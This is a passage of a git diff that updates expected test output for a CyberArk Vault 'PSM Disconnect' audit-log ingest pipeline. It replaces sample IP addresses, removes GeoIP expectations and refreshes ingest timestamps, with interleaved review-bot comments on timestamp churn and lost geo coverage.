08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json index 831db67eb33..43602b598e1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json 
@@ -84,7 +84,7 @@ "event": { "severity": 2, "duration": 7000000000, - "ingested": "2021-06-09T10:24:31.624781500Z", + "ingested": "2021-12-09T13:36:49.813714300Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating 
System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"302\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "302", "kind": "event", 
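Review bot: The only change in this hunk is `event.ingested` moving from a June to a December wall-clock value, which the test harness stamps at run time, so this field will differ on every regeneration and keeps producing expected-file churn unrelated to the fix; the hunks starting at -204 and -324 further down carry the same churn. If the pipeline test config for this data stream supports excluding dynamic fields from comparison (elastic-package's `dynamic_fields` setting, if available at the version in use), registering `event.ingested` there would keep future diffs limited to the fields the change actually touches. I cannot see the test config from here, so this is inferred from the hunk alone.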
@@ -108,20 +108,11 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "34.123.103.115",
 "user": {
 "name": "adrian"
 },
- "ip": "34.123.103.115"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "source": {
 "user": {
@@ -145,7 +136,7 @@
 },
 "@timestamp": "2021-03-11T17:38:26.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian"
+ "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian"
 },
 "ecs": {
 "version": "1.12.0"
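Review bot: Swapping the destination IP to 67.43.156.15 removes the whole `destination.geo` object from the expected document with nothing added in its place, so after this change the fixture no longer exercises the pipeline's GeoIP enrichment of `destination.ip` at all; the hunk at -228 below does the same for the second event. If that loss of coverage is intended because the test GeoIP database does not resolve this range, it is worth stating in the PR description; otherwise choosing an address from the supported test subset that the database does resolve would keep both the realistic-IP goal and the geo assertion. I cannot tell from the diff alone whether the enrichment is skipped or simply unresolved, so this is a question rather than a defect.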
@@ -157,15 +148,15 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:38:26Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 
Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e",
 "message": "PSM Disconnect",
 "issuer": "Administrator",
 "extra_details": {
@@ -178,21 +169,21 @@
 "psmid": "PSMServer",
 "session_id": "87012dcc-8290-11eb-949e-080027efd402",
 "src_host": "127.0.0.1",
- "dst_host": "34.123.103.115",
+ "dst_host": "67.43.156.15",
 "session_duration": "00:00:13"
 },
 "rfc5424": true,
 "ca_properties": {
 "other": {},
 "device_type": "Operating System",
- "address": "34.123.103.115",
+ "address": "67.43.156.15",
 "creation_method": "PVWA",
 "policy_id": "UnixSSHKeys",
 "user_name": "adrian"
 },
- "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
+ "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian",
 "safe": "PSM",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "PSM Disconnect",
 "timestamp": "Mar 11 09:38:26",
 "desc": "PSM Disconnect"
@@ -204,8 +195,8 @@ "event": { "severity": 2, "duration": 13000000000, - "ingested": "2021-06-09T10:24:31.624794100Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813723Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -228,20 +219,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -265,7 +247,7 @@ }, "@timestamp": "2021-03-11T17:47:01.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -277,15 +259,15 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:47:01Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:47:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:47:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:47:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:47:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 
Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e",
 "message": "PSM Disconnect",
 "issuer": "Administrator",
 "extra_details": {
@@ -298,21 +280,21 @@
 "psmid": "PSMServer",
 "session_id": "ba22b012-8291-11eb-b981-080027efd402",
 "src_host": "127.0.0.1",
- "dst_host": "34.123.103.115",
+ "dst_host": "67.43.156.15",
 "session_duration": "00:00:11"
 },
 "rfc5424": true,
 "ca_properties": {
 "other": {},
 "device_type": "Operating System",
- "address": "34.123.103.115",
+ "address": "67.43.156.15",
 "creation_method": "PVWA",
 "policy_id": "UnixSSHKeys",
 "user_name": "adrian"
 },
- "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
+ "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian",
 "safe": "PSM",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "PSM Disconnect",
 "timestamp": "Mar 11 09:47:01",
 "desc": "PSM Disconnect"
